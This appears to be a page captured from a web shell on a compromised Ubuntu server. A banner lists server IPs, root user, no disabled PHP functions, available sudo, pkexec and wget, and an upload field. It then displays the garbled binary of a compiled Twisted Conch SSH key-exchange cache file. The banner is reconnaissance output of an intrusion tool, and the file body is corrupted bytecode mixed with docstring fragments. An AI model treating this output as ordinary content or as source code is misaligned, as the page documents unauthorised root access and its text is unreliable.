Server IP : 209.38.156.173 / Your IP : 216.73.216.122 [ Web Server : Apache/2.4.52 (Ubuntu) System : Linux lakekumayuhotel 5.15.0-136-generic #147-Ubuntu SMP Sat Mar 15 15:53:30 UTC 2025 x86_64 User : root ( 0) PHP Version : 8.1.2-1ubuntu2.22 Disable Function : NONE Domains : 2 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /usr/lib/python3/dist-packages/twisted/conch/ssh/__pycache__/ |
Upload File : |
o �bw! � @ s� d Z ddlmZmZmZmZ ddlmZmZm Z ddl mZ G dd� de�ZG dd� de�Z G d d � d e�ZG dd� de�Ze e�G d d� d��Ze e�G dd� d��Ze e�G dd� d��Ze e�G dd� d��Ze e�G dd� d��Ze e�G dd� d��Ze e�G dd� d��Ze e �G dd� d��Ze� e� e� e� e� e� e� e� d�Zdd� Zd d!� Zd"d#� Zd$d%� Zd&d'� Zd(d)� Zd*S )+z SSH key exchange handling. � )�sha1�sha256�sha384�sha512)� Attribute� Interface�implementer)�errorc @ � e Zd ZdZed�Zed�ZdS )�_IKexAlgorithmzB An L{_IKexAlgorithm} describes a key exchange algorithm. z�An L{int} giving the preference of the algorithm when negotiating key exchange. Algorithms with lower precedence values are more preferred.zqA callable hash algorithm constructor (e.g. C{hashlib.sha256}) suitable for use with this key exchange algorithm.N)�__name__� __module__�__qualname__�__doc__r � preference� hashProcessor� r r �8/usr/lib/python3/dist-packages/twisted/conch/ssh/_kex.pyr s ��r c @ r )�_IFixedGroupKexAlgorithmzu An L{_IFixedGroupKexAlgorithm} describes a key exchange algorithm with a fixed prime / generator group. zdAn L{int} giving the prime number used in Diffie-Hellman key exchange, or L{None} if not applicable.z�An L{int} giving the generator number used in Diffie-Hellman key exchange, or L{None} if not applicable. (This is not related to Python generator functions.)N)r r r r r �prime� generatorr r r r r "